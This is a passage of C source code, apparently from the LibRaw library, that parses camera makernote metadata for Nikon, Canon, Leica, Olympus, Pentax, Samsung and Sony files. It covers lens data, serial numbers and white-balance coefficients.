imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Sigma_X3F;
strcpy(imgdata.lens.makernotes.Adapter, "MC-11");
}
else if ((imgdata.lens.makernotes.LensID > 0xEF00) &&
(imgdata.lens.makernotes.LensID < 0xFFFF) &&
(imgdata.lens.makernotes.LensID != 0xFF00))
{
imgdata.lens.makernotes.AdapterID = 0xEF00;
imgdata.lens.makernotes.LensID -= imgdata.lens.makernotes.AdapterID;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Canon_EF;
}
}
if ((id >= 286) && (id <= 293))
// "SLT-A65", "SLT-A77", "NEX-7", "NEX-VG20E",
// "SLT-A37", "SLT-A57", "NEX-F3", "Lunar"
parseSonyLensFeatures (SonySubstitution[buf[0x115]],
SonySubstitution[buf[0x116]]);
else if (imgdata.lens.makernotes.CameraMount != LIBRAW_MOUNT_FixedLens)
parseSonyLensFeatures(SonySubstitution[buf[0x116]], SonySubstitution[buf[0x117]]);
if ((id == 347) || (id == 350) || (id == 357))
{
unsigned long long b88 = SonySubstitution[buf[0x88]];
unsigned long long b89 = SonySubstitution[buf[0x89]];
unsigned long long b8a = SonySubstitution[buf[0x8a]];
unsigned long long b8b = SonySubstitution[buf[0x8b]];
unsigned long long b8c = SonySubstitution[buf[0x8c]];
unsigned long long b8d = SonySubstitution[buf[0x8d]];
sprintf(imgdata.shootinginfo.InternalBodySerial, "%06llx",
(b88 << 40) + (b89 << 32) + (b8a << 24) + (b8b << 16) + (b8c << 8) + b8d);
}
else if ((imgdata.lens.makernotes.CameraMount == LIBRAW_MOUNT_Minolta_A) && (id > 279) && (id != 282) && (id != 283))
{
unsigned long long bf0 = SonySubstitution[buf[0xf0]];
unsigned long long bf1 = SonySubstitution[buf[0xf1]];
unsigned long long bf2 = SonySubstitution[buf[0xf2]];
unsigned long long bf3 = SonySubstitution[buf[0xf3]];
unsigned long long bf4 = SonySubstitution[buf[0xf4]];
sprintf(imgdata.shootinginfo.InternalBodySerial, "%05llx",
(bf0 << 32) + (bf1 << 24) + (bf2 << 16) + (bf3 << 8) + bf4);
}
else if ((imgdata.lens.makernotes.CameraMount == LIBRAW_MOUNT_Sony_E) && (id != 288) && (id != 289) && (id != 290))
{
unsigned b7c = SonySubstitution[buf[0x7c]];
unsigned b7d = SonySubstitution[buf[0x7d]];
unsigned b7e = SonySubstitution[buf[0x7e]];
unsigned b7f = SonySubstitution[buf[0x7f]];
sprintf(imgdata.shootinginfo.InternalBodySerial, "%04x", (b7c << 24) + (b7d << 16) + (b7e << 8) + b7f);
}
return;
}
void CLASS parse_makernote_0xc634(int base, int uptag, unsigned dng_writer)
{
unsigned ver97 = 0, offset = 0, entries, tag, type, len, save, c;
unsigned i;
uchar NikonKey, ci, cj, ck;
unsigned serial = 0;
unsigned custom_serial = 0;
unsigned NikonLensDataVersion = 0;
unsigned lenNikonLensData = 0;
unsigned NikonFlashInfoVersion = 0;
uchar *CanonCameraInfo;
unsigned lenCanonCameraInfo = 0;
uchar *table_buf;
uchar *table_buf_0x9050;
ushort table_buf_0x9050_present = 0;
uchar *table_buf_0x940c;
ushort table_buf_0x940c_present = 0;
short morder, sorder = order;
char buf[10];
INT64 fsize = ifp->size();
fread(buf, 1, 10, ifp);
if (!strcmp(buf, "Nikon")) {
base = ftell(ifp);
order = get2();
if (get2() != 42) goto quit;
offset = get4();
fseek(ifp, offset - 8, SEEK_CUR);
}
else if (!strcmp(buf, "OLYMPUS") ||
!strcmp(buf, "PENTAX ") ||
(!strncmp(make, "SAMSUNG", 7) && (dng_writer == CameraDNG))) {
base = ftell(ifp) - 10;
fseek(ifp, -2, SEEK_CUR);
order = get2();
if (buf[0] == 'O') get2();
}
else if (!strncmp(buf, "SONY", 4) ||
!strcmp(buf, "Panasonic")) {
goto nf;
}
else if (!strncmp(buf, "FUJIFILM", 8)) {
base = ftell(ifp) - 10;
nf: order = 0x4949;
fseek(ifp, 2, SEEK_CUR);
}
else if (!strcmp(buf, "OLYMP") ||
!strcmp(buf, "LEICA") ||
!strcmp(buf, "Ricoh") ||
!strcmp(buf, "EPSON"))
fseek(ifp, -2, SEEK_CUR);
else if (!strcmp(buf, "AOC") ||
!strcmp(buf, "QVC"))
fseek(ifp, -4, SEEK_CUR);
else {
fseek(ifp, -10, SEEK_CUR);
if ((!strncmp(make, "SAMSUNG", 7) &&
(dng_writer == AdobeDNG)))
base = ftell(ifp);
}
entries = get2();
if (entries > 1000) return;
morder = order;
while (entries--) {
order = morder;
tiff_get(base, &tag, &type, &len, &save);
INT64 pos = ifp->tell();
if(len > 8 && pos+len > 2* fsize) continue;
tag |= uptag << 16;
if(len > 100*1024*1024) goto next; // 100Mb tag? No!
if (!strncmp(make, "Canon",5))
{
if (tag == 0x000d && len < 256000) // camera info
{
CanonCameraInfo = (uchar*)malloc(MAX(16,len));
fread(CanonCameraInfo, len, 1, ifp);
lenCanonCameraInfo = len;
}
else if (tag == 0x10) // Canon ModelID
{
unique_id = get4();
if (unique_id == 0x03740000) unique_id = 0x80000374; // M3
if (unique_id == 0x03840000) unique_id = 0x80000384; // M10
if (unique_id == 0x03940000) unique_id = 0x80000394; // M5
setCanonBodyFeatures(unique_id);
if (lenCanonCameraInfo)
{
processCanonCameraInfo(unique_id, CanonCameraInfo,lenCanonCameraInfo);
free(CanonCameraInfo);
CanonCameraInfo = 0;
lenCanonCameraInfo = 0;
}
}
else parseCanonMakernotes (tag, type, len);
}
else if (!strncmp(make, "FUJI", 4))
parseFujiMakernotes (tag, type);
else if (!strncasecmp(make, "LEICA", 5))
{
if (((tag == 0x035e) || (tag == 0x035f)) && (type == 10) && (len == 9))
{
int ind = tag == 0x035e?0:1;
for (int j=0; j < 3; j++)
FORCC imgdata.color.dng_color[ind].forwardmatrix[j][c]= getreal(type);
}
if ((tag == 0x0303) && (type != 4))
{
stmread(imgdata.lens.makernotes.Lens, len,ifp);
}
if ((tag == 0x3405) ||
(tag == 0x0310) ||
(tag == 0x34003405))
{
imgdata.lens.makernotes.LensID = get4();
imgdata.lens.makernotes.LensID =
((imgdata.lens.makernotes.LensID>>2)<<8) |
(imgdata.lens.makernotes.LensID & 0x3);
if (imgdata.lens.makernotes.LensID != -1)
{
if ((model[0] == 'M') ||
!strncasecmp (model, "LEICA M", 7))
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Leica_M;
if (imgdata.lens.makernotes.LensID)
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Leica_M;
}
else if ((model[0] == 'S') ||
!strncasecmp (model, "LEICA S", 7))
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Leica_S;
if (imgdata.lens.makernotes.Lens[0])
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Leica_S;
}
}
}
else if (
((tag == 0x0313) || (tag == 0x34003406)) &&
(fabs(imgdata.lens.makernotes.CurAp) < 0.17f) &&
((type == 10) || (type == 5))
)
{
imgdata.lens.makernotes.CurAp = getreal(type);
if (imgdata.lens.makernotes.CurAp > 126.3)
imgdata.lens.makernotes.CurAp = 0.0f;
}
else if (tag == 0x3400)
{
parse_makernote (base, 0x3400);
}
}
else if (!strncmp(make, "NIKON", 5))
{
if (tag == 0x1d) // serial number
while ((c = fgetc(ifp)) && c != EOF)
{
if ((!custom_serial) && (!isdigit(c)))
{
if ((strbuflen(model) == 3) && (!strcmp(model,"D50")))
{
custom_serial = 34;
}
else
{
custom_serial = 96;
}
}
serial = serial*10 + (isdigit(c) ? c - '0' : c % 10);
}
else if (tag == 0x000a)
{
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
}
else if (tag == 0x0082) // lens attachment
{
stmread(imgdata.lens.makernotes.Attachment, len, ifp);
}
else if (tag == 0x0083) // lens type
{
imgdata.lens.nikon.NikonLensType = fgetc(ifp);
}
else if (tag == 0x0084) // lens
{
imgdata.lens.makernotes.MinFocal = getreal(type);
imgdata.lens.makernotes.MaxFocal = getreal(type);
imgdata.lens.makernotes.MaxAp4MinFocal = getreal(type);
imgdata.lens.makernotes.MaxAp4MaxFocal = getreal(type);
}
else if (tag == 0x008b) // lens f-stops
{
uchar a, b, c;
a = fgetc(ifp);
b = fgetc(ifp);
c = fgetc(ifp);
if (c)
{
imgdata.lens.nikon.NikonLensFStops = a*b*(12/c);
imgdata.lens.makernotes.LensFStops =
(float)imgdata.lens.nikon.NikonLensFStops /12.0f;
}
}
else if (tag == 0x0093)
{
i = get2();
if ((i == 7) || (i == 9))
{
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
}
}
else if (tag == 0x0097)
{
for (i=0; i < 4; i++)
ver97 = ver97 * 10 + fgetc(ifp)-'0';
if (ver97 == 601) // Coolpix A
{
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
}
}
else if (tag == 0x0098) // contains lens data
{
for (i = 0; i < 4; i++)
{
NikonLensDataVersion = NikonLensDataVersion * 10 + fgetc(ifp) - '0';
}
switch (NikonLensDataVersion)
{
case 100: lenNikonLensData = 9; break;
case 101:
case 201: // encrypted, starting from v.201
case 202:
case 203: lenNikonLensData = 15; break;
case 204: lenNikonLensData = 16; break;
case 400: lenNikonLensData = 459; break;
case 401: lenNikonLensData = 590; break;
case 402: lenNikonLensData = 509; break;
case 403: lenNikonLensData = 879; break;
}
if(lenNikonLensData)
{
table_buf = (uchar*)malloc(lenNikonLensData);
fread(table_buf, lenNikonLensData, 1, ifp);
if ((NikonLensDataVersion < 201) && lenNikonLensData)
{
processNikonLensData(table_buf, lenNikonLensData);
free(table_buf);
lenNikonLensData = 0;
}
}
}
else if (tag == 0xa7) // shutter count
{
NikonKey = fgetc(ifp) ^ fgetc(ifp) ^ fgetc(ifp) ^ fgetc(ifp);
if ((NikonLensDataVersion > 200) && lenNikonLensData)
{
if (custom_serial)
{
ci = xlat[0][custom_serial];
}
else
{
ci = xlat[0][serial & 0xff];
}
cj = xlat[1][NikonKey];
ck = 0x60;
for (i = 0; i < lenNikonLensData; i++)
table_buf[i] ^= (cj += ci * ck++);
processNikonLensData(table_buf, lenNikonLensData);
lenNikonLensData = 0;
free(table_buf);
}
}
else if (tag == 0x00a8) // contains flash data
{
for (i = 0; i < 4; i++)
{
NikonFlashInfoVersion = NikonFlashInfoVersion * 10 + fgetc(ifp) - '0';
}
}
else if (tag == 37 && (!iso_speed || iso_speed == 65535))
{
unsigned char cc;
fread(&cc, 1, 1, ifp);
iso_speed = (int)(100.0 * libraw_powf64(2.0, (double)(cc) / 12.0 - 5.0));
break;
}
}
else if (!strncmp(make, "OLYMPUS", 7))
{
int SubDirOffsetValid =
strncmp (model, "E-300", 5) &&
strncmp (model, "E-330", 5) &&
strncmp (model, "E-400", 5) &&
strncmp (model, "E-500", 5) &&
strncmp (model, "E-1", 3);
if ((tag == 0x2010) || (tag == 0x2020))
{
fseek(ifp, save - 4, SEEK_SET);
fseek(ifp, base + get4(), SEEK_SET);
parse_makernote_0xc634(base, tag, dng_writer);
}
if (!SubDirOffsetValid &&
((len > 4) ||
( ((type == 3) || (type == 8)) && (len > 2)) ||
( ((type == 4) || (type == 9)) && (len > 1)) || (type == 5) || (type > 9)))
goto skip_Oly_broken_tags;
switch (tag) {
case 0x0207:
case 0x20100100:
{
uchar sOlyID[8];
unsigned long long OlyID;
fread (sOlyID, MIN(len,7), 1, ifp);
sOlyID[7] = 0;
OlyID = sOlyID[0];
i = 1;
while (i < 7 && sOlyID[i])
{
OlyID = OlyID << 8 | sOlyID[i];
i++;
}
setOlympusBodyFeatures(OlyID);
}
break;
case 0x1002:
imgdata.lens.makernotes.CurAp = libraw_powf64(2.0f, getreal(type)/2);
break;
case 0x20100102:
stmread(imgdata.shootinginfo.InternalBodySerial, len, ifp);
break;
case 0x20100201:
imgdata.lens.makernotes.LensID =
(unsigned long long)fgetc(ifp)<<16 |
(unsigned long long)(fgetc(ifp), fgetc(ifp))<<8 |
(unsigned long long)fgetc(ifp);
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FT;
imgdata.lens.makernotes.LensFormat = LIBRAW_FORMAT_FT;
if (((imgdata.lens.makernotes.LensID < 0x20000) ||
(imgdata.lens.makernotes.LensID > 0x4ffff)) &&
(imgdata.lens.makernotes.LensID & 0x10))
{
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_mFT;
}
break;
case 0x20100202:
if ((!imgdata.lens.LensSerial[0]))
stmread(imgdata.lens.LensSerial, len, ifp);
break;
case 0x20100203:
stmread(imgdata.lens.makernotes.Lens,len, ifp);
break;
case 0x20100205:
imgdata.lens.makernotes.MaxAp4MinFocal = libraw_powf64(sqrt(2.0f), get2() / 256.0f);
break;
case 0x20100206:
imgdata.lens.makernotes.MaxAp4MaxFocal = libraw_powf64(sqrt(2.0f), get2() / 256.0f);
break;
case 0x20100207:
imgdata.lens.makernotes.MinFocal = (float)get2();
break;
case 0x20100208:
imgdata.lens.makernotes.MaxFocal = (float)get2();
if (imgdata.lens.makernotes.MaxFocal > 1000.0f)
imgdata.lens.makernotes.MaxFocal = imgdata.lens.makernotes.MinFocal;
break;
case 0x2010020a:
imgdata.lens.makernotes.MaxAp4CurFocal = libraw_powf64(sqrt(2.0f), get2() / 256.0f);
break;
case 0x20100301:
imgdata.lens.makernotes.TeleconverterID = fgetc(ifp) << 8;
fgetc(ifp);
imgdata.lens.makernotes.TeleconverterID =
imgdata.lens.makernotes.TeleconverterID | fgetc(ifp);
break;
case 0x20100303:
stmread(imgdata.lens.makernotes.Teleconverter, len, ifp);
break;
case 0x20100403:
stmread(imgdata.lens.makernotes.Attachment,len, ifp);
break;
case 0x20200401:
imgdata.other.FlashEC = getreal(type);
break;
}
skip_Oly_broken_tags:;
}
else if (!strncmp(make, "PENTAX", 6) ||
!strncmp(model, "PENTAX", 6) ||
(!strncmp(make, "SAMSUNG", 7) && (dng_writer == CameraDNG)))
{
if (tag == 0x0005)
{
unique_id = get4();
setPentaxBodyFeatures(unique_id);
}
else if (tag == 0x0013)
{
imgdata.lens.makernotes.CurAp = (float)get2()/10.0f;
}
else if (tag == 0x0014)
{
PentaxISO(get2());
}
else if (tag == 0x001d)
{
imgdata.lens.makernotes.CurFocal = (float)get4()/100.0f;
}
else if (tag == 0x003f)
{
imgdata.lens.makernotes.LensID = fgetc(ifp) << 8 | fgetc(ifp);
}
else if (tag == 0x004d)
{
if (type == 9) imgdata.other.FlashEC = getreal(type) / 256.0f;
else imgdata.other.FlashEC = (float) ((signed short) fgetc(ifp)) / 6.0f;
}
else if (tag == 0x007e)
{
imgdata.color.linear_max[0] =
imgdata.color.linear_max[1] =
imgdata.color.linear_max[2] =
imgdata.color.linear_max[3] = (long)(-1) * get4();
}
else if (tag == 0x0207)
{
if(len < 65535) // Safety belt
PentaxLensInfo(imgdata.lens.makernotes.CamID, len);
}
else if (tag == 0x020d)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Daylight][c ^ (c >> 1)] = get2();
}
else if (tag == 0x020e)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][c ^ (c >> 1)] = get2();
}
else if (tag == 0x020f)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Cloudy][c ^ (c >> 1)] = get2();
}
else if (tag == 0x0210)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][c ^ (c >> 1)] = get2();
}
else if (tag == 0x0211)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][c ^ (c >> 1)] = get2();
}
else if (tag == 0x0212)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_N][c ^ (c >> 1)] = get2();
}
else if (tag == 0x0213)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][c ^ (c >> 1)] = get2();
}
else if (tag == 0x0214)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][c ^ (c >> 1)] = get2();
}
else if (tag == 0x0221)
{
int nWB = get2();
if(nWB<=sizeof(imgdata.color.WBCT_Coeffs)/sizeof(imgdata.color.WBCT_Coeffs[0]))
for (int i = 0; i < nWB; i++)
{
imgdata.color.WBCT_Coeffs[i][0] = (unsigned)0xcfc6 - get2();
fseek(ifp, 2, SEEK_CUR);
imgdata.color.WBCT_Coeffs[i][1] = get2();
imgdata.color.WBCT_Coeffs[i][2] = imgdata.color.WBCT_Coeffs[i][4] = 0x2000;
imgdata.color.WBCT_Coeffs[i][3] = get2();
}
}
else if (tag == 0x0215)
{
fseek (ifp, 16, SEEK_CUR);
sprintf(imgdata.shootinginfo.InternalBodySerial, "%d", get4());
}
else if (tag == 0x0229)
{
stmread(imgdata.shootinginfo.BodySerial, len, ifp);
}
else if (tag == 0x022d)
{
fseek (ifp,2,SEEK_CUR);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Daylight][c ^ (c >> 1)] = get2();
getc(ifp);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][c ^ (c >> 1)] = get2();
getc(ifp);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Cloudy][c ^ (c >> 1)] = get2();
getc(ifp);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][c ^ (c >> 1)] = get2();
getc(ifp);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][c ^ (c >> 1)] = get2();
getc(ifp);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_N][c ^ (c >> 1)] = get2();
getc(ifp);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][c ^ (c >> 1)] = get2();
getc(ifp);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][c ^ (c >> 1)] = get2();
getc(ifp);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_L][c ^ (c >> 1)] = get2();
}
else if (tag == 0x0239) // Q-series lens info (LensInfoQ)
{
char LensInfo [20];
fseek (ifp, 12, SEEK_CUR);
stread(imgdata.lens.makernotes.Lens, 30, ifp);
strcat(imgdata.lens.makernotes.Lens, " ");
stread(LensInfo, 20, ifp);
strcat(imgdata.lens.makernotes.Lens, LensInfo);
}
}
else if (!strncmp(make, "SAMSUNG", 7) &&
(dng_writer == AdobeDNG))
{
if (tag == 0x0002)
{
if(get4() == 0x2000)
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Samsung_NX;
}
else if (!strncmp(model, "NX mini", 7))
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Samsung_NX_M;
}
else
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FixedLens;
}
}
else if (tag == 0x0003)
{
imgdata.lens.makernotes.CamID = unique_id = get4();
}
else if (tag == 0xa003)
{
imgdata.lens.makernotes.LensID = get2();
if (imgdata.lens.makernotes.LensID)
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Samsung_NX;
}
else if (tag == 0xa005)
{
stmread(imgdata.lens.InternalLensSerial, len, ifp);
}
else if (tag == 0xa019)
{
imgdata.lens.makernotes.CurAp = getreal(type);
}
else if (tag == 0xa01a)
{
imgdata.lens.makernotes.FocalLengthIn35mmFormat = get4() / 10.0f;
if (imgdata.lens.makernotes.FocalLengthIn35mmFormat < 10.0f)
imgdata.lens.makernotes.FocalLengthIn35mmFormat *= 10.0f;
}
}
else if (!strncasecmp(make, "SONY", 4) ||
!strncasecmp(make, "Konica", 6) ||
!strncasecmp(make, "Minolta", 7) ||
(!strncasecmp(make, "Hasselblad", 10) &&
(!strncasecmp(model, "Stellar", 7) ||
!strncasecmp(model, "Lunar", 5) ||
!strncasecmp(model, "Lusso", 5) ||
!strncasecmp(model, "HV",2))))
{
ushort lid;
if (tag == 0xb001) // Sony ModelID
{
unique_id = get2();
setSonyBodyFeatures(unique_id);
if (table_buf_0x9050_present)
{
process_Sony_0x9050(table_buf_0x9050, unique_id);
free (table_buf_0x9050);
table_buf_0x9050_present = 0;
}
if (table_buf_0x940c_present)
{
if (imgdata.lens.makernotes.CameraMount == LIBRAW_MOUNT_Sony_E)
{
process_Sony_0x940c(table_buf_0x940c);
}
free (table_buf_0x940c);
table_buf_0x940c_present = 0;
}
}
else if ((tag == 0x0010) && // CameraInfo
strncasecmp(model, "DSLR-A100", 9) &&
strncasecmp(model, "NEX-5C", 6) &&
!strncasecmp(make, "SONY", 4) &&
((len == 368) || // a700
(len == 5478) || // a850, a900
(len == 5506) || // a200, a300, a350
(len == 6118) || // a230, a290, a330, a380, a390
// a450, a500, a550, a560, a580
// a33, a35, a55
// NEX3, NEX5, NEX5C, NEXC3, VG10E
(len == 15360))
)
{
table_buf = (uchar*)malloc(len);
fread(table_buf, len, 1, ifp);
if (memcmp(table_buf, "\xff\xff\xff\xff\xff\xff\xff\xff", 8) &&
memcmp(table_buf, "\x00\x00\x00\x00\x00\x00\x00\x00", 8))
{
switch (len) {
case 368:
case 5478:
// a700, a850, a900: CameraInfo
if (saneSonyCameraInfo(table_buf[0], table_buf[3], table_buf[2], table_buf[5], table_buf[4], table_buf[7]))
{
if (table_buf[0] | table_buf[3])
imgdata.lens.makernotes.MinFocal =
bcd2dec(table_buf[0]) * 100 + bcd2dec(table_buf[3]);
if (table_buf[2] | table_buf[5])
imgdata.lens.makernotes.MaxFocal =
bcd2dec(table_buf[2]) * 100 + bcd2dec(table_buf[5]);
if (table_buf[4])
imgdata.lens.makernotes.MaxAp4MinFocal = bcd2dec(table_buf[4]) / 10.0f;
if (table_buf[4])
imgdata.lens.makernotes.MaxAp4MaxFocal = bcd2dec(table_buf[7]) / 10.0f;
parseSonyLensFeatures(table_buf[1], table_buf[6]);
}
break;
default:
// CameraInfo2 & 3
if (saneSonyCameraInfo(table_buf[1], table_buf[2], table_buf[3], table_buf[4], table_buf[5], table_buf[6]))
{
if (table_buf[1] | table_buf[2])
imgdata.lens.makernotes.MinFocal =
bcd2dec(table_buf[1]) * 100 + bcd2dec(table_buf[2]);
if (table_buf[3] | table_buf[4])
imgdata.lens.makernotes.MaxFocal =
bcd2dec(table_buf[3]) * 100 + bcd2dec(table_buf[4]);
if (table_buf[5])
imgdata.lens.makernotes.MaxAp4MinFocal = bcd2dec(table_buf[5]) / 10.0f;
if (table_buf[6])
imgdata.lens.makernotes.MaxAp4MaxFocal = bcd2dec(table_buf[6]) / 10.0f;
parseSonyLensFeatures(table_buf[0], table_buf[7]);
}
}
}
free(table_buf);
}
else if (tag == 0x0104)
{
imgdata.other.FlashEC = getreal(type);
}
else if (tag == 0x0105) // Teleconverter
{
imgdata.lens.makernotes.TeleconverterID = get2();
}
else if (tag == 0x0114 && len < 65535) // CameraSettings
{
table_buf = (uchar*)malloc(len);
fread(table_buf, len, 1, ifp);
switch (len) {
case 280:
case 364:
case 332:
// CameraSettings and CameraSettings2 are big endian
if (table_buf[2] | table_buf[3])
{
lid = (((ushort)table_buf[2])<<8) |
((ushort)table_buf[3]);
imgdata.lens.makernotes.CurAp =
libraw_powf64(2.0f, ((float)lid/8.0f-1.0f)/2.0f);
}
break;
case 1536:
case 2048:
// CameraSettings3 are little endian
parseSonyLensType2(table_buf[1016], table_buf[1015]);
if (imgdata.lens.makernotes.LensMount != LIBRAW_MOUNT_Canon_EF)
{
switch (table_buf[153]) {
case 16: imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Minolta_A; break;
case 17: imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Sony_E; break;
}
}
break;
}
free(table_buf);
}
else if (tag == 0x9050 && len < 256000) // little endian
{
table_buf_0x9050 = (uchar*)malloc(len);
table_buf_0x9050_present = 1;
fread(table_buf_0x9050, len, 1, ifp);
if (imgdata.lens.makernotes.CamID)
{
process_Sony_0x9050(table_buf_0x9050, imgdata.lens.makernotes.CamID);
free (table_buf_0x9050);
table_buf_0x9050_present = 0;
}
}
else if (tag == 0x940c && len < 256000)
{
table_buf_0x940c = (uchar*)malloc(len);
table_buf_0x940c_present = 1;
fread(table_buf_0x940c, len, 1, ifp);
if ((imgdata.lens.makernotes.CamID) &&
(imgdata.lens.makernotes.CameraMount == LIBRAW_MOUNT_Sony_E))
{
process_Sony_0x940c(table_buf_0x940c);
free(table_buf_0x940c);
table_buf_0x940c_present = 0;
}
}
else if (((tag == 0xb027) || (tag == 0x010c)) && (imgdata.lens.makernotes.LensID == -1))
{
imgdata.lens.makernotes.LensID = get4();
if ((imgdata.lens.makernotes.LensID > 0x4900) &&
(imgdata.lens.makernotes.LensID <= 0x5900))
{
imgdata.lens.makernotes.AdapterID = 0x4900;
imgdata.lens.makernotes.LensID -= imgdata.lens.makernotes.AdapterID;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Sigma_X3F;
strcpy(imgdata.lens.makernotes.Adapter, "MC-11");
}
else if ((imgdata.lens.makernotes.LensID > 0xEF00) &&
(imgdata.lens.makernotes.LensID < 0xFFFF) &&
(imgdata.lens.makernotes.LensID != 0xFF00))
{
imgdata.lens.makernotes.AdapterID = 0xEF00;
imgdata.lens.makernotes.LensID -= imgdata.lens.makernotes.AdapterID;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Canon_EF;
}
if (tag == 0x010c) imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Minolta_A;
}
else if (tag == 0xb02a && len < 256000) // Sony LensSpec
{
table_buf = (uchar*)malloc(len);
fread(table_buf, len, 1, ifp);
if (saneSonyCameraInfo(table_buf[1], table_buf[2], table_buf[3], table_buf[4], table_buf[5], table_buf[6]))
{
if (table_buf[1] | table_buf[2])
imgdata.lens.makernotes.MinFocal =
bcd2dec(table_buf[1]) * 100 + bcd2dec(table_buf[2]);
if (table_buf[3] | table_buf[4])
imgdata.lens.makernotes.MaxFocal =
bcd2dec(table_buf[3]) * 100 + bcd2dec(table_buf[4]);
if (table_buf[5])
imgdata.lens.makernotes.MaxAp4MinFocal = bcd2dec(table_buf[5]) / 10.0f;
if (table_buf[6])
imgdata.lens.makernotes.MaxAp4MaxFocal = bcd2dec(table_buf[6]) / 10.0f;
parseSonyLensFeatures(table_buf[0], table_buf[7]);
}
free(table_buf);
}
}
next:
fseek (ifp, save, SEEK_SET);
}
quit:
order = sorder;
}
#else
void CLASS parse_makernote_0xc634(int base, int uptag, unsigned dng_writer)
{
/*placeholder */
}
#endif
void CLASS parse_makernote (int base, int uptag)
{
unsigned offset=0, entries, tag, type, len, save, c;
unsigned ver97=0, serial=0, i, wbi=0, wb[4]={0,0,0,0};
uchar buf97[324], ci, cj, ck;
short morder, sorder=order;
char buf[10];
unsigned SamsungKey[11];
uchar NikonKey;
#ifdef LIBRAW_LIBRARY_BUILD
unsigned custom_serial = 0;
unsigned NikonLensDataVersion = 0;
unsigned lenNikonLensData = 0;
unsigned NikonFlashInfoVersion = 0;
uchar *CanonCameraInfo;
unsigned lenCanonCameraInfo = 0;
uchar *table_buf;
uchar *table_buf_0x9050;
ushort table_buf_0x9050_present = 0;
uchar *table_buf_0x940c;
ushort table_buf_0x940c_present = 0;
INT64 fsize = ifp->size();
#endif
/*
The MakerNote might have its own TIFF header (possibly with
its own byte-order!), or it might just be a table.
*/
if (!strncmp(make,"Nokia",5)) return;
fread (buf, 1, 10, ifp);
if (!strncmp (buf,"KDK" ,3) || /* these aren't TIFF tables */
!strncmp (buf,"VER" ,3) ||
!strncmp (buf,"IIII",4) ||
!strncmp (buf,"MMMM",4)) return;
if (!strncmp (buf,"KC" ,2) || /* Konica KD-400Z, KD-510Z */
!strncmp (buf,"MLY" ,3)) { /* Minolta DiMAGE G series */
order = 0x4d4d;
while ((i=ftell(ifp)) < data_offset && i < 16384) {
wb[0] = wb[2]; wb[2] = wb[1]; wb[1] = wb[3];
wb[3] = get2();
if (wb[1] == 256 && wb[3] == 256 &&
wb[0] > 256 && wb[0] < 640 && wb[2] > 256 && wb[2] < 640)
FORC4 cam_mul[c] = wb[c];
}
goto quit;
}
if (!strcmp (buf,"Nikon")) {
base = ftell(ifp);
order = get2();
if (get2() != 42) goto quit;
offset = get4();
fseek (ifp, offset-8, SEEK_CUR);
} else if (!strcmp (buf,"OLYMPUS") ||
!strcmp (buf,"PENTAX ")) {
base = ftell(ifp)-10;
fseek (ifp, -2, SEEK_CUR);
order = get2();
if (buf[0] == 'O') get2();
} else if (!strncmp (buf,"SONY",4) ||
!strcmp (buf,"Panasonic")) {
goto nf;
} else if (!strncmp (buf,"FUJIFILM",8)) {
base = ftell(ifp)-10;
nf: order = 0x4949;
fseek (ifp, 2, SEEK_CUR);
} else if (!strcmp (buf,"OLYMP") ||
!strcmp (buf,"LEICA") ||
!strcmp (buf,"Ricoh") ||
!strcmp (buf,"EPSON"))
fseek (ifp, -2, SEEK_CUR);
else if (!strcmp (buf,"AOC") ||
!strcmp (buf,"QVC"))
fseek (ifp, -4, SEEK_CUR);
else {
fseek (ifp, -10, SEEK_CUR);
if (!strncmp(make,"SAMSUNG",7))
base = ftell(ifp);
}
// adjust pos & base for Leica M8/M9/M Mono tags and dir in tag 0x3400
if (!strncasecmp(make, "LEICA", 5))
{
if (!strncmp(model, "M8", 2) ||
!strncasecmp(model, "Leica M8", 8) ||
!strncasecmp(model, "LEICA X", 7))
{
base = ftell(ifp)-8;
}
else if (!strncasecmp(model, "LEICA M (Typ 240)", 17))
{
base = 0;
}
else if (!strncmp(model, "M9", 2) ||
!strncasecmp(model, "Leica M9", 8) ||
